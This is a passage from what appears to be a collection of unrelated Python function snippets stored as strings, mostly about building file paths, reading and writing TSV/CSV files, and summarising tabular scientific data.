unicode(cell).encode('unicode-escape') for cell in row])+'\\n')", "def info(self):\n tline = \"\"\n for (ii, projection) in enumerate(self._ProjectionList):\n tiltAngle = projection._tiltAngle\n transX = -projection._alignmentTransX\n transY = -projection._alignmentTransY\n rot = -(projection._alignmentRotation + 90.)\n mag = projection._alignmentMagnification\n tline = tline + (\"%3d: \" % ii)\n tline = tline + (\"%15s; \" % projection._filename)\n tline = tline + (\"tiltAngle=%9.3f; \" % tiltAngle)\n tline = tline + (\"transX=%9.3f; \" % transX)\n tline = tline + (\"transY=%9.3f; \" % transY)\n tline = tline + (\"rot=%9.3f; \" % rot)\n tline = tline + (\"mag=%9.3f\\n\" % mag)\n print(tline)", "def _prettyfilename(self):\n return f'{self.title} ({self.subtype})'", "def get_log_file(self):\n self.log_file = os.path.join(\n self.directory,\n \"ts\",\n self.ts.reaction_label,\n \"conformers\",\n \"{}_{}_{}.log\".format(self.ts.reaction_label, self.ts.direction, self.ts.index))\n return self.log_file", "def _get_kps_ann_file(self):\n prefix = 'person_keypoints' if 'test' not in self.image_set else 'image_info'\n return os.path.join(self.data_path, 'annotations',\n prefix + '_' + self.image_set + '.json')", "def _get_filepath(self) -> str:\n return os.path.join(\n os.sep.join(\n [\n self.period.value,\n 'activities',\n f'activities_{self._dt_string}.json'\n ]\n )\n )", "def parse_table_to_tracy_file(latname: str, df: pd.DataFrame, filename: str) -> None:\n save_string(parse_table_to_tracy_string(latname, df), filename)", "def _tokens_path(self, row):\n return os.path.join(self.path, 'texts', row.tokens_path())", "def reportinfo(self):\n return self.fspath, 0, f\"usecase: {self.name}\"", "def out_filename(self, filetype, format='old', dir=Location.OUT_DIR):\n filename = self.filename(filetype=filetype, format=format)\n #return Path(dir) / filename\n return filename", "def out_filename(self, filetype, format='old', dir=Location.OUT_DIR):\n filename = self.filename(filetype=filetype, format=format)\n # return Path(dir) / filename\n return filename", "def save_vtu_file(arr, name, filename, sample_fp=None):\n if sample_fp == None:\n sample_fp = vda.get_sorted_fps_U(self.settings.DATA_FP)[0]\n\n ug = vtktools.vtu(sample_fp) #use sample fp to initialize positions on grid\n\n ug.AddScalarField('name', arr)\n ug.Write(filename)", "def summarize_tsvs(\n self,\n tsv_dir,\n dd,\n prefix=\"\",\n outlier_threshold=10,\n omit_props=[\n \"project_id\",\n \"type\",\n \"id\",\n \"submitter_id\",\n \"case_submitter_id\",\n \"case_ids\",\n \"visit_id\",\n \"sample_id\",\n \"md5sum\",\n \"file_name\",\n \"object_id\",\n \"series_uid\",\n \"study_uid\",\n \"token_record_id\"\n ],\n omit_nodes=[\"metaschema\", \"root\", \"program\", \"project\", \"data_release\"],\n outdir=\".\",\n bin_limit=False,\n write_report=True,\n report_null=True,\n ):\n\n summary = {}\n\n report = pd.DataFrame(\n columns=[\n \"prop_id\",\n \"project_id\",\n \"node\",\n \"property\",\n \"type\",\n \"N\",\n \"nn\",\n \"null\",\n \"perc_null\",\n \"all_null\",\n \"min\",\n \"max\",\n \"median\",\n \"mean\",\n \"stdev\",\n \"outliers\",\n \"bin_number\",\n \"bins\",\n ]\n )\n report[\"all_null\"] = report[\"all_null\"].astype(bool)\n\n dir_pattern = \"{}*{}\".format(prefix, \"tsvs\")\n project_dirs = glob.glob(\"{}/{}\".format(tsv_dir, dir_pattern))\n\n nn_nodes, nn_props, null_nodes, null_props, all_prop_ids = [], [], [], [], []\n\n msg = \"Summarizing TSVs in '{}':\\n\".format(tsv_dir)\n print(\"\\n\\n{}\".format(msg))\n\n for project_dir in project_dirs: # project_dir=project_dirs[0]\n\n try:\n project_id = re.search(\n r\"^{}/?([A-Za-z0-9_-]+)_tsvs$\".format(tsv_dir), project_dir\n ).group(1)\n except:\n print(\n \"Couldn't extract the project_id from project_dir '{}'!\".format(\n project_dir\n )\n )\n\n fpattern = \"{}*{}\".format(prefix, \".tsv\")\n fnames = glob.glob(\"{}/{}\".format(project_dir, fpattern))\n\n # msg = \"\\t\\tFound the following {} TSVs: {}\".format(len(fnames),fnames)\n # sys.stdout.write(\"\\r\" + str(msg))\n\n # print(fnames) # trouble-shooting\n if len(fnames) == 0:\n continue\n\n for (\n fname\n ) in (\n fnames\n ): # Each node with data in the project is in one TSV file so len(fnames) is the number of nodes in the project with data.\n\n # print(\"\\n\\t\\t{}\".format(fname)) # trouble-shooting\n\n node_regex = (\n re.escape(project_id) + r\"_([a-zA-Z0-9_]+)\\.tsv$\"\n ) # node = re.search(r'^([a-zA-Z0-9_]+)-([a-zA-Z0-9]+)_([a-zA-Z0-9_]+)\\.tsv$',fname).group(3)\n\n try:\n node = re.search(node_regex, fname, re.IGNORECASE).group(1)\n\n except Exception as e:\n print(\n \"\\n\\nCouldn't set node with node_regex on '{}':\\n\\t{}\".format(\n fname, e\n )\n )\n node = fname\n\n df = pd.read_csv(fname, sep=\"\\t\", header=0, dtype=str)\n\n if df.empty:\n print(\"\\t\\t'{}' TSV is empty. No data to summarize.\\n\".format(node))\n\n else:\n nn_nodes.append(node)\n prop_regex = re.compile(\n r\"^[A-Za-z0-9_]*[^.]$\"\n ) # drop the links, e.g., cases.submitter_id or diagnoses.id (matches all properties with no \".\")\n props = list(\n filter(prop_regex.match, list(df))\n ) # properties in this TSV to summarize\n props = [\n prop for prop in props if prop not in omit_props\n ] # omit_props=['project_id','type','id','submitter_id','case_submitter_id','case_ids','visit_id','sample_id','md5sum','file_name','object_id']\n\n # msg = \"\\t\\tTotal of {} records in '{}' TSV with {} properties.\".format(len(df),node,len(props))\n # sys.stdout.write(\"\\r\"+str(msg))\n\n for prop in props: # prop=props[0]\n\n prop_name = \"{}.{}\".format(node, prop)\n prop_id = \"{}.{}\".format(project_id, prop_name)\n print(prop_name)\n\n # because of sheepdog bug, need to inclue \"None\" in \"null\" (:facepalm:) https://ctds-planx.atlassian.net/browse/PXP-5663\n #df.at[df[prop] == \"None\", prop] = np.nan\n\n null = df.loc[df[prop].isnull()]\n nn = df.loc[df[prop].notnull()]\n perc_null = len(null)/len(df)\n ptype = self.get_prop_type(node, prop, dd)\n\n # dict for the prop's row in report dataframe\n prop_stats = {\n \"prop_id\": prop_id,\n \"project_id\": project_id,\n \"node\": node,\n \"property\": prop,\n \"type\": ptype,\n \"N\": len(df),\n \"nn\": len(nn),\n \"null\": len(null),\n \"perc_null\": perc_null,\n \"all_null\": np.nan,\n \"min\": np.nan,\n \"max\": np.nan,\n \"median\": np.nan,\n \"mean\": np.nan,\n \"stdev\": np.nan,\n \"outliers\": np.nan,\n \"bin_number\": np.nan,\n \"bins\": np.nan,\n }\n\n if nn.empty:\n null_props.append(prop_name)\n prop_stats[\"all_null\"] = True\n\n else:\n nn_props.append(prop_name)\n all_prop_ids.append(prop_id)\n prop_stats[\"all_null\"] = False\n\n msg = \"\\t'{}'\".format(prop_id)\n sys.stdout.write(\"\\r\" + str(msg).ljust(200, \" \"))\n\n if ptype in [\"string\", \"enum\", \"array\", \"boolean\", \"date\"]:\n\n if ptype == \"array\":\n\n all_bins = list(nn[prop])\n bin_list = [\n bin_txt.split(\",\") for bin_txt in list(nn[prop])\n ]\n counts = Counter(\n [\n item\n for sublist in bin_list\n for item in sublist\n ]\n )\n\n elif ptype in [\"string\", \"enum\", \"boolean\", \"date\"]:\n\n counts = Counter(nn[prop])\n\n df1 = pd.DataFrame.from_dict(\n counts, orient=\"index\"\n ).reset_index()\n bins = [tuple(x) for x in df1.values]\n bins = sorted(\n sorted(bins, key=lambda x: (x[0])),\n key=lambda x: (x[1]),\n reverse=True,\n ) # sort first by name, then by value. This way, names with same value are in same order.\n\n prop_stats[\"bins\"] = bins\n prop_stats[\"bin_number\"] = len(bins)\n\n # Get stats for numbers\n elif ptype in [\"number\", \"integer\"]: # prop='concentration'\n\n # make a list of the data values as floats (converted from strings)\n nn_all = nn[prop]\n d_all = list(nn_all)\n\n nn_num = (\n nn[prop]\n .apply(pd.to_numeric, errors=\"coerce\")\n .dropna()\n )\n d = list(nn_num)\n\n nn_string = nn.loc[~nn[prop].isin(list(map(str, d)))]\n non_numbers = list(nn_string[prop])\n\n if (\n len(d) > 0\n ): # if there are numbers in the data, calculate numeric stats\n\n # calculate summary stats using the float list d\n mean = statistics.mean(d)\n median = statistics.median(d)\n minimum = min(d)\n maximum = max(d)\n\n if (\n len(d) == 1\n ): # if only one value, no stdev and no outliers\n std = \"NA\"\n outliers = []\n else:\n std = statistics.stdev(d)\n # Get outliers by mean +/- outlier_threshold * stdev\n cutoff = (\n std * outlier_threshold\n ) # three times the standard deviation is default\n lower, upper = (\n mean - cutoff,\n mean + cutoff,\n ) # cut-offs for outliers is 3 times the stdev below and above the mean\n outliers = sorted(\n list(\n set(\n [\n x\n for x in d\n if x < lower or x > upper\n ]\n )\n )\n )\n\n # if property type is 'integer', change min, max, median to int type\n if ptype == \"integer\":\n median = int(median) # median\n minimum = int(minimum) # min\n maximum = int(maximum) # max\n outliers = [\n int(i) for i in outliers\n ] # convert outliers from float to int\n\n prop_stats[\"stdev\"] = std\n prop_stats[\"mean\"] = mean\n prop_stats[\"median\"] = median\n prop_stats[\"min\"] = minimum\n prop_stats[\"max\"] = maximum\n prop_stats[\"outliers\"] = outliers\n\n # check if numeric property is mixed with strings, and if so, summarize the string data\n if len(d_all) > len(d):\n\n msg = \"\\t\\tFound {} string values among the {} records of prop '{}' with value(s): {}. Calculating stats only for the {} numeric values.\".format(\n len(non_numbers),\n len(nn),\n prop,\n list(set(non_numbers)),\n len(d),\n )\n print(\"\\n\\t{}\\n\".format(msg))\n\n prop_stats[\"type\"] = \"mixed {},string\".format(ptype)\n\n counts = Counter(nn_string[prop])\n df1 = pd.DataFrame.from_dict(\n counts, orient=\"index\"\n ).reset_index()\n bins = [tuple(x) for x in df1.values]\n bins = sorted(\n sorted(bins, key=lambda x: (x[0])),\n key=lambda x: (x[1]),\n reverse=True,\n )\n prop_stats[\"bins\"] = bins\n prop_stats[\"bin_number\"] = len(bins)\n\n else: # If its not in the list of ptypes, exit. Need to add array handling.\n print(\n \"\\t\\t\\n\\n\\n\\nUnhandled property type!\\n\\n '{}': {}\\n\\n\\n\\n\".format(\n prop_id, ptype\n )\n )\n exit()\n\n if bin_limit and isinstance(prop_stats[\"bins\"], list): # if bin_limit != False\n prop_stats[\"bins\"] = prop_stats[\"bins\"][: int(bin_limit)]\n\n #report = report.append(prop_stats, ignore_index=True)\n # print(\"\\n{}\\n\".format(report))\n # print(\"\\n{}\\n\".format(prop_stats))\n pdf = pd.DataFrame.from_records([prop_stats])\n pdf['all_null'] = pdf['all_null'].astype(bool)\n report = pd.concat([report,pdf])\n\n\n if not report_null: # if report_null == False\n report = report.loc[report[\"all_null\"] != True]\n\n # strip the col names so we can sort the report\n report.columns = report.columns.str.strip()\n report.sort_values(by=[\"all_null\", \"node\", \"property\"], inplace=True)\n\n summary[\"report\"] = report\n summary[\"all_prop_ids\"] = all_prop_ids\n\n # summarize all properties\n nn_props = sorted(list(set(nn_props)))\n summary[\"nn_props\"] = nn_props\n\n null_props = [prop for prop in null_props if prop not in nn_props]\n summary[\"null_props\"] = sorted(list(set(null_props)))\n\n # summarize all nodes\n nn_nodes = sorted(list(set(nn_nodes)))\n summary[\"nn_nodes\"] = nn_nodes\n\n dd_regex = re.compile(r\"[^_][A-Za-z0-9_]+\")\n dd_nodes = list(filter(dd_regex.match, list(dd)))\n dd_nodes = [node for node in dd_nodes if node not in omit_nodes]\n null_nodes = [node for node in dd_nodes if node not in nn_nodes]\n\n summary[\"null_nodes\"] = null_nodes\n\n if write_report: # write_report == True\n\n self.create_output_dir(outdir=outdir)\n\n if \"/\" in tsv_dir:\n names = tsv_dir.split(\"/\")\n names = [name for name in names if name != \"\"]\n name = names[-1]\n else:\n name = tsv_dir\n\n outname = \"data_summary_{}.tsv\".format(name)\n outname = \"{}/{}\".format(\n outdir, outname\n ) # ./data_summary_prod_tsvs_04272020.tsv\n\n report.to_csv(outname, sep=\"\\t\", index=False, encoding=\"utf-8\")\n sys.stdout.write(\"\\rReport written to file:\".ljust(200, \" \"))\n print(\"\\n\\t{}\".format(outname))\n\n return summary", "def out_featuretxt(self):\n return self.outputfrominput(inputformat='csv', stripextension='.csv', addextension='.features.csv')", "def get_T2_tiff_path(path_TIFF, i, annotations='T2M+'):\n\tpath_pat = os.path.join(path_TIFF, i)\n\tfinal_path = os.path.join(path_pat, i + annotations)\n\treturn final_path", "def _prettyfilename(self):\n return f'{self.title} ({self.year})'", "def _get_output_filename(dataset_dir):\n return os.path.join(dataset_dir, 'pokemon.tfrecord')", "def output():\n\n if args.top and not args.tfidf and not args.svd:\n most_frequent(vector).to_csv(path_or_buf=\"top{}_vectorfile.csv\".format(args.top))\n\n elif args.top and args.tfidf and not args.svd:\n tfidf_transform(most_frequent(vector)).to_csv(path_or_buf=\"tfidf_top{}.csv\".format(args.top))\n\n elif args.top and args.tfidf and args.svd:\n svd_transform(tfidf_transform(most_frequent(vector)), indexes).to_csv(path_or_buf=\"svd{}_tfidf_topn.csv\".format(args.svd))\n\n elif args.tfidf and not args.top and not args.svd:\n tfidf_transform(vector).to_csv(path_or_buf=\"tfidf.csv\")\n\n elif args.svd and not args.top and not args.tfidf:\n svd_transform(vector, indexes).to_csv(path_or_buf=\"svd{}_vector.csv\".format(args.svd))\n\n elif args.tfidf and args.svd and not args.top:\n svd_transform(tfidf_transform(vector), indexes).to_csv(path_or_buf=\"svd{}_tfidf.csv\".format(args.svd))\n\n else:\n vector.to_csv(path_or_buf=\"vectorfile.csv\")", "def get_format_table(self):\n try:\n with open(self._config.values['format'], 'r') as f:\n return f.read()\n except:\n return None", "def get_tdf_file(path):\r\n \r\n prj_file_path = os.path.join(path,\".project\")\r\n if os.path.exists(prj_file_path):\r\n etree = ElementTree.parse(prj_file_path)\r\n \r\n el_name = etree.find(\"name\")\r\n if el_name != None:\r\n return el_name.text\r\n else:\r\n logging.getLogger('cone.thememl').error(\"The element name is not in %s\" % prj_file_path)\r\n else:\r\n logging.getLogger('cone.thememl').info(\"No .project file found. Trying to find tdf file.\")\r\n for root,dirs,files in os.walk(path):\r\n for f in files:\r\n if f.endswith('tdf'):\r\n return re.sub('\\.tdf', '', os.path.join(root, f))", "def _get_otype(cls, fname):\n with open(fname) as foo:\n line = foo.readline()\n if \"zonebudget version\" in line.lower():\n otype = 0\n elif \"time step\" in line.lower():\n otype = 1\n elif \"totim\" in line.lower():\n otype = 2\n else:\n raise AssertionError(\"Cant distinguish output type\")\n return otype", "def file_path(self):\n return self._obs_file()", "def svn_info_t_prejfile_get(svn_info_t_self): # real signature unknown; restored from __doc__\n return \"\"", "def get_filename(self, exported_datetime=None):\n formatted_model = self.model_cls._meta.label_lower.replace(\".\", \"_\")\n formatted_date = exported_datetime.strftime('%Y%m%d%H%M%S')\n return f'{formatted_model}_{formatted_date}.csv'", "def createFileCSV(table, path=\"./prediction\"):\t\n\tif len(table) < 1:\n\t\traise NameError('Empty Table!')\n\telse:\n\t\tfile = open(path + '.csv', 'w+')\n\n\t\tfile.write(table[0].toStringHeaders() + \"\\n\")\n\n\t\tfor row in table:\n\t\t\tfile.write(row.toStringCSV() + '\\n')\n\t\tfile.close()", "def _get_target_name(self, n, k, att, pol, emb_dim):\n threshold = str(int(self.threshold * 10))\n agg_name = \"_{}_{}_{}_{}_{}_{}\".format(n, k, att, pol, emb_dim, threshold)\n target_file = self.source_file[:-4] + agg_name + \".csv\"\n return target_file", "def sirv_report_txt(self):\n return op.join(self.root_dir, 'SIRV_evaluation_summary.txt')", "def _get_tree_file(h5_file):\n f_name = os.path.basename(h5_file)\n try:\n year = parse_year(f_name)\n tree_file = f_name.split(str(year))[0] + 'tree.pkl'\n except RuntimeError:\n tree_file = f_name.replace('.h5', '_tree.pkl')\n\n return tree_file", "def convertSVT(svtImgDir, svtXMLFile, outPrefix, objectives):\n\n imgFileList, wordList = svtXML(svtXMLFile)\n lenList, charMat = wordsToChars(wordList)\n outFilenames = makeLabelFiles(objectives, svtImgDir, imgFileList, lenList,\n charMat, outPrefix)\n return outFilenames", "def new_tree_file_name(alignment):\n return '%s.tre' % alignment", "def get_tsv_dataset(dataset_path):\n if not os.path.exists(dataset_path):\n logging.error('No such path %s', dataset_path)\n return None\n\n try:\n ds_file = open(dataset_path)\n data = ds_file.readline().strip().split('\\t')\n return data\n except Exception:\n logging.error('Unexpected error getting data from %s', dataset_path, exc_info=True)\n\n # would have happened automatically, but explicit is always better than implicit\n return None", "def _scans_tsv(raw, raw_fname, fname, keep_source, overwrite=False):\n # get measurement date in UTC from the data info\n meas_date = raw.info[\"meas_date\"]\n if meas_date is None:\n acq_time = \"n/a\"\n elif isinstance(meas_date, datetime):\n acq_time = meas_date.strftime(\"%Y-%m-%dT%H:%M:%S.%fZ\")\n\n # for fif files check whether raw file is likely to be split\n raw_fnames = [raw_fname]\n if raw_fname.endswith(\".fif\"):\n # check whether fif files were split when saved\n # use the files in the target directory what should be written\n # to scans.tsv\n datatype, basename = raw_fname.split(os.sep)\n raw_dir = op.join(op.dirname(fname), datatype)\n raw_files = [f for f in os.listdir(raw_dir) if f.endswith(\".fif\")]\n if basename not in raw_files:\n raw_fnames = []\n split_base = basename.replace(\"_meg.fif\", \"_split-{}\")\n for raw_f in raw_files:\n if len(raw_f.split(\"_split-\")) == 2:\n if split_base.format(raw_f.split(\"_split-\")[1]) == raw_f:\n raw_fnames.append(op.join(datatype, raw_f))\n raw_fnames.sort()\n\n data = OrderedDict(\n [\n (\n \"filename\",\n [\"{:s}\".format(raw_f.replace(os.sep, \"/\")) for raw_f in raw_fnames],\n ),\n (\"acq_time\", [acq_time] * len(raw_fnames)),\n ]\n )\n\n # add source filename if desired\n if keep_source:\n data[\"source\"] = [Path(src_fname).name for src_fname in raw.filenames]\n\n # write out a sidecar JSON if not exists\n sidecar_json_path = Path(fname).with_suffix(\".json\")\n sidecar_json_path = get_bids_path_from_fname(sidecar_json_path)\n sidecar_json = {\"source\": {\"Description\": \"Original source filename.\"}}\n\n if sidecar_json_path.fpath.exists():\n update_sidecar_json(sidecar_json_path, sidecar_json)\n else:\n _write_json(sidecar_json_path, sidecar_json)\n\n if os.path.exists(fname):\n orig_data = _from_tsv(fname)\n # if the file name is already in the file raise an error\n if raw_fname in orig_data[\"filename\"] and not overwrite:\n raise FileExistsError(\n f'\"{raw_fname}\" already exists in '\n f\"the scans list. Please set \"\n f\"overwrite to True.\"\n )\n\n for key in data.keys():\n if key in orig_data:\n continue\n\n # add 'n/a' if any missing columns\n orig_data[key] = [\"n/a\"] * len(next(iter(data.values())))\n\n # otherwise add the new data\n data = _combine_rows(orig_data, data, \"filename\")\n\n # overwrite is forced to True as all issues with overwrite == False have\n # been handled by this point\n _write_tsv(fname, data, True)", "def ts_to_filepath(self, timestamp, room_name):\n path = \"{output_directory}/{room_name}_{date}.log\"\n # synapse timestamps are in milliseconds\n date = datetime.utcfromtimestamp(timestamp / 1000).strftime(\"%Y%m%d\")\n return path.format(\n output_directory=self.output_directory, room_name=room_name, date=date\n )", "def _prettyfilename(self):\n return self.title", "def tsv_generator(file):\n for line in fileinput.input(file):\n article, summary = line.strip().split(\"\\t\")\n yield (article, summary)", "def get_hypervisor_std_file(uuid):\n return DIR + uuid + \"-hypervisor-usage-std.csv\"", "def outfile(self):\n return os.path.join(self.outfile_dir, constant.OUTFILE_TABLE + self.table_name)", "def getFile(self, stamp):\n name = escapeForPath(str(stamp))\n return os.path.join(self.path, name)", "def collapsed_to_sirv_gff(self):\n return op.join(self.collapse_to_sirv_dir, \"touse.gff\")", "def summary(args):\n from jcvi.formats.base import DictFile\n from jcvi.utils.cbook import percentage, Registry\n\n p = OptionParser(summary.__doc__)\n p.add_option(\"--extra\", help=\"Cross with extra tsv file\")\n opts, args = p.parse_args(args)\n\n if len(args) != 2:\n sys.exit(not p.print_help())\n\n frfile, statusfile = args\n status = DictFile(statusfile)\n fp = open(frfile)\n registry = Registry() # keeps all the tags for any given gene\n for row in fp:\n seqid, gene, tag = row.split()\n if tag == \".\":\n registry[gene].append(\"outside\")\n else:\n registry[gene].append(\"inside\")\n if tag[0] == \"[\":\n registry[gene].append(\"no_syntenic_model\")\n if tag.startswith(\"[S]\"):\n registry[gene].append(\"[S]\")\n gstatus = status.get(gene, None)\n if gstatus == \"complete\":\n registry[gene].append(\"complete\")\n elif gstatus == \"pseudogene\":\n registry[gene].append(\"pseudogene\")\n elif gstatus == \"partial\":\n registry[gene].append(\"partial\")\n else:\n registry[gene].append(\"gmap_fail\")\n elif tag.startswith(\"[NS]\"):\n registry[gene].append(\"[NS]\")\n if \"random\" in tag or \"Scaffold\" in tag:\n registry[gene].append(\"random\")\n else:\n registry[gene].append(\"real_ns\")\n elif tag.startswith(\"[NF]\"):\n registry[gene].append(\"[NF]\")\n else:\n registry[gene].append(\"syntenic_model\")\n\n inside = registry.count(\"inside\")\n outside = registry.count(\"outside\")\n syntenic = registry.count(\"syntenic_model\")\n non_syntenic = registry.count(\"no_syntenic_model\")\n s = registry.count(\"[S]\")\n ns = registry.count(\"[NS]\")\n nf = registry.count(\"[NF]\")\n complete = registry.count(\"complete\")\n pseudogene = registry.count(\"pseudogene\")\n partial = registry.count(\"partial\")\n gmap_fail = registry.count(\"gmap_fail\")\n random = registry.count(\"random\")\n real_ns = registry.count(\"real_ns\")\n\n complete_models = registry.get_tag(\"complete\")\n pseudogenes = registry.get_tag(\"pseudogene\")\n partial_deletions = registry.get_tag(\"partial\")\n\n m = \"{0} inside synteny blocks\\n\".format(inside)\n m += \"{0} outside synteny blocks\\n\".format(outside)\n m += \"{0} has syntenic gene\\n\".format(syntenic)\n m += \"{0} lack syntenic gene\\n\".format(non_syntenic)\n m += \"{0} has sequence match in syntenic location\\n\".format(s)\n m += \"{0} has sequence match in non-syntenic location\\n\".format(ns)\n m += \"{0} has sequence match in un-ordered scaffolds\\n\".format(random)\n m += \"{0} has sequence match in real non-syntenic location\\n\".format(real_ns)\n m += \"{0} has no sequence match\\n\".format(nf)\n m += \"{0} syntenic sequence - complete model\\n\".format(percentage(complete, s))\n m += \"{0} syntenic sequence - partial model\\n\".format(percentage(partial, s))\n m += \"{0} syntenic sequence - pseudogene\\n\".format(percentage(pseudogene, s))\n m += \"{0} syntenic sequence - gmap fail\\n\".format(percentage(gmap_fail, s))\n print(m, file=sys.stderr)\n\n aa = [\"complete_models\", \"partial_deletions\", \"pseudogenes\"]\n bb = [complete_models, partial_deletions, pseudogenes]\n for a, b in zip(aa, bb):\n fw = open(a, \"w\")\n print(\"\\n\".join(b), file=fw)\n fw.close()\n\n extra = opts.extra\n if extra:\n registry.update_from(extra)\n\n fp.seek(0)\n fw = open(\"registry\", \"w\")\n for row in fp:\n seqid, gene, tag = row.split()\n ts = registry[gene]\n print(\"\\t\".join((seqid, gene, tag, \"-\".join(ts))), file=fw)\n fw.close()\n\n logging.debug(\"Registry written.\")", "def get_traj_status(self, traj):\n raise NotImplementedError", "def write_tsvs(raw_dir: Path, bids_dir: Path):\n\n print(\"Writing tsvs.\")\n\n for path_to_onset in Path(raw_dir/\"onset_textfiles\").glob(\"*.txt\"):\n\n onsets_as_lines_with_too_much_whitespace = path_to_onset.read_text().splitlines()\n onsets = [line.strip() for line in onsets_as_lines_with_too_much_whitespace]\n\n tsv_lines_without_a_header = [onset + \"\\t\" + \"4\" for onset in onsets]\n tsv_lines = [\"onset\" + \"\\t\" + \"duration\"] + tsv_lines_without_a_header\n full_text_of_tsv = \"\\n\".join(tsv_lines)\n\n subject_id = subject_id_of(path_to_onset)\n task_id = path_to_onset.stem.split(\"_\")[1]\n\n func_path_to_imitate = the_path_that_matches(f\"*_task-{task_id}*.nii\", in_directory=bids_dir/f\"sub-{subject_id}/func\")\n func_stem_split_into_parts = func_path_to_imitate.stem.split(\"_\")\n tsv_stem_split_into_parts = func_stem_split_into_parts[:-1] + [\"events\"]\n tsv_stem = \"_\".join(tsv_stem_split_into_parts)\n tsv_path = func_path_to_imitate.with_name(tsv_stem + \".tsv\")\n\n tsv_path.write_text(full_text_of_tsv)", "def save_annotations_table(annotations: dict, outfile: str):\n\n vals = [a.table_data() for a in annotations.values()]\n\n df = pd.DataFrame(vals)\n\n df.to_csv(outfile)", "def get_tilename_cache_file(tablename):\n dir=get_tilename_cache_dir()\n fname='%s-tilenames.fits' % tablename\n return os.path.join(dir, fname)", "def info_file(self):\n return self._info_file", "def flag_file(self):\n return os.path.join(self.flag_dir, self.flag_name)", "def out_filename(self, filetype, dir, format='old'):\n filename = self.filename(filetype=filetype, format=format)\n return Path(dir) / filename", "def _write_tsv(\n output_path,\n records,\n):\n df = pandas.DataFrame(records)\n output_path.write_text(df.to_csv(index=False, sep='\\t'))", "def tiltmeter_output_by_deployment(deployment):\n cur_file = f\"proc_current_profile_{deployment}.csv\"\n cur_file = os.path.join(os.getenv(\"SENTRY_DATA\"),\n f\"tiltmeter/proc/{cur_file}\")\n return cur_file", "def generate_filename(self):\n file_pattern = os.path.join(self.path, \"TCGA-*\")\n for f in glob(file_pattern):\n organ = get_organ(f)\n for raw_f in glob(os.path.join(f, \"*.tif\")):\n gt_f = raw_f.replace(\".tif\", \".xml\")\n yield raw_f, gt_f, organ", "def _read_tsv(cls, input_file, quotechar=None):\n with tf.gfile.Open(input_file,\"r\") as f:\n reader = csv.reader(f,delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n lines.append(line)\n return lines", "def get_vignettes_data(file_path, vignette_type, classification_type):\n df = pd.read_csv(file_path, index_col=False)\n df = df[df[\"dataset\"] == vignette_type]\n\n if classification_type == \"polar\":\n return df[\"text\"].values, df[\"polarity\"].values\n return df[\"text\"].values, df[\"category\"].values", "def tsv_sheet_germline_platform_name():\n f = io.StringIO(\n textwrap.dedent(\n \"\"\"\n patientName\\tfatherName\\tmotherName\\tsex\\tisAffected\\tlibraryType\\tfolderName\\thpoTerms\\tseqPlatform\n 12_347\\t.\\t.\\tF\\tN\\tWGS\\t12_347\\t.\\tIllumina\n 12_347\\t.\\t.\\tF\\tN\\tWGS\\t12_347\\t.\\tPacBio\n \"\"\".lstrip()\n )\n )\n return f", "def tsv_sheet_germline_no_header():\n f = io.StringIO(\n textwrap.dedent(\n \"\"\"\n patientName\\tfatherName\\tmotherName\\tsex\\tisAffected\\tlibraryType\\tfolderName\\thpoTerms\n 12_345\\t12_346\\t12_347\\tM\\tY\\tWGS\\t12_345\\tHP:0009946,HP:0009899\n 12_348\\t12_346\\t12_347\\tM\\tN\\tWGS\\t12_348\\t.\n 12_346\\t.\\t.\\tM\\tN\\t.\\t.\\t.\n 12_347\\t.\\t.\\tF\\tN\\tWGS\\t12_347\\t.\n \"\"\".lstrip()\n )\n )\n return f", "def _get_csv_path(name):\n return os.path.join(cwd, 'output/app_info', name)", "def get_filename_df(level, env='stage', pattern=None):\n fnames = get_filenames(level, env=env, pattern=pattern)\n iuvs_fnames = []\n for fname in fnames:\n if not level == 'hk':\n iuvs_fnames.append(ScienceFilename(fname))\n else:\n iuvs_fnames.append(HKFilename(fname))\n df = pd.DataFrame([fname.as_series() for fname in iuvs_fnames])\n if level != 'hk':\n df['channel'] = df.channel.astype('category')\n df.set_index('time', inplace=True)\n df.sort_index(inplace=True)\n # next line filters for newest revisions\n return df[df.p.isin(df.groupby('obs_id', sort=False)['p'].max())]", "def _filepath(self, filename):\n return os.path.join(self.root, self.version, filename)", "def getLevel(unique_name):", "def feature_table(chr_id, source, orient, genes, transcripts, cds, exons, unk):\n for gname, ginfo in genes.items():\n line = [str(chr_id), \n 'gbk_to_gff',\n ginfo[3],\n str(ginfo[0]),\n str(ginfo[1]),\n '.',\n ginfo[2],\n '.',\n 'ID='+str(gname)+';Name='+str(gname)+';Note='+ginfo[-1]]\n print '\\t'.join(line) \n ## construct the transcript line is not defined in the original file \n t_line = [str(chr_id), 'gbk_to_gff', source, 0, 1, '.', ginfo[2], '.'] \n\n if not transcripts:\n t_line.append('ID=Transcript:'+str(gname)+';Parent='+str(gname))\n\n if exons: ## get the entire transcript region from the defined feature\n t_line[3] = str(exons[gname][0][0])\n t_line[4] = str(exons[gname][0][-1])\n elif cds:\n t_line[3] = str(cds[gname][0][0])\n t_line[4] = str(cds[gname][0][-1])\n print '\\t'.join(t_line) \n\n if exons:\n exon_line_print(t_line, exons[gname], 'Transcript:'+str(gname), 'exon')\n\n if cds:\n exon_line_print(t_line, cds[gname], 'Transcript:'+str(gname), 'CDS')\n if not exons:\n exon_line_print(t_line, cds[gname], 'Transcript:'+str(gname), 'exon')\n\n else: ## transcript is defined \n for idx in transcripts[gname]: \n t_line[2] = idx[3]\n t_line[3] = str(idx[0])\n t_line[4] = str(idx[1])\n t_line.append('ID='+str(idx[2])+';Parent='+str(gname))\n print '\\t'.join(t_line) \n \n ## feature line print call \n if exons:\n exon_line_print(t_line, exons[gname], str(idx[2]), 'exon')\n if cds:\n exon_line_print(t_line, cds[gname], str(idx[2]), 'CDS')\n if not exons:\n exon_line_print(t_line, cds[gname], str(idx[2]), 'exon')\n\n if len(genes) == 0: ## feature entry with fragment information \n \n line = [str(chr_id), 'gbk_to_gff', source, 0, 1, '.', orient, '.'] \n fStart = fStop = None \n\n for eid, ex in cds.items(): \n fStart = ex[0][0] \n fStop = ex[0][-1]\n\n for eid, ex in exons.items(): \n fStart = ex[0][0] \n fStop = ex[0][-1]\n\n if fStart or fStart:\n\n line[2] = 'gene'\n line[3] = str(fStart)\n line[4] = str(fStop)\n line.append('ID=Unknown_Gene_' + str(unk) + ';Name=Unknown_Gene_' + str(unk))\n print \"\\t\".join(line)\n\n if not cds:\n line[2] = 'transcript'\n else:\n line[2] = 'mRNA'\n line[8] = 'ID=Unknown_Transcript_' + str(unk) + ';Parent=Unknown_Gene_' + str(unk)\n print 